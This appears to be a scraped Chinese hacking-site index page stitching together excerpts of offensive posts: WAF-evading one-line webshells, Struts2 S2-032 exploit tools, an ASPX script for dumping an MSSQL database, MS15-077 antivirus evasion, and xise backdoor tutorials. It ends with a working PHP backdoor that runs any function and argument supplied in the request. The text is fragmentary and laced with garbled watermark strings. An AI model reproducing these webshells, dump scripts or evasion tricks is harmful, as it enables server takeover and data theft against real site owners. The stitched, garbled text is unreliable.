iisspy.exe读取IIS信息

该代码从aspxspy 2014 里面抠出来的
场景: - 低调求发展* N: P3 |' X, u' U# X! ~
服务器不支持aspx
用vbs 无权限 查询wimc - 专注网络安全* @# L* z" |  t" j( W0 M

2016最新过狗一句话 asp、php、aspx

asp:


--------------------------------------------------------------

<%
dim play
'
'
'''''''''''''&#

7kbscan 7kbdomainui图形化版多引擎批量关键字域名采集最新版

7kbscan 7kbdomainui图形化版多引擎批量关键字域名采集

Struts2批量漏洞检测工具

批量检测是否存在s2-016,s2-019,s2-032漏洞

Struts2漏洞利用

sturt2-032漏洞利用工具及源码

Struts032漏洞利用工具.jpg

Struts2 s2-032远程代码执行分析

Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。

aspx wget脱裤脚本

<%@ Page Language="C#" Debug="false" %>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="System.Data.Common"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<script runat="server">
protected void Page_Load(object sender,EventArgs e)
{
    Response.Buffer = true;
        Server.ScriptTimeout = 2147483647;
    
    string sConnStr = "Driver={Sql Server};Server=192.168.1.5;Uid=mssql用户名;Pwd=mssql密码;Database=库名"; //这里是连接字符串
    string sSQL = "SELECT * FROM [库名].dbo.[表名]";  //这里是导哪个库哪个表的语句,可以写多条语句,用半角分号隔开

MS15-077免杀过360全套20160419

MS15-077免杀过360

xise后门箱子制作教程附工具

xise菜刀寄生虫箱子去除后门以及加后门教程

xise菜刀


  Tags:

2款不易查杀的PHP一句话后门

<?php

//door.php?ctime=exec&atime=whoami

@extract ($_REQUEST);
@die ($ctime($atime));
?>
<?php
//door.php?p={"a":&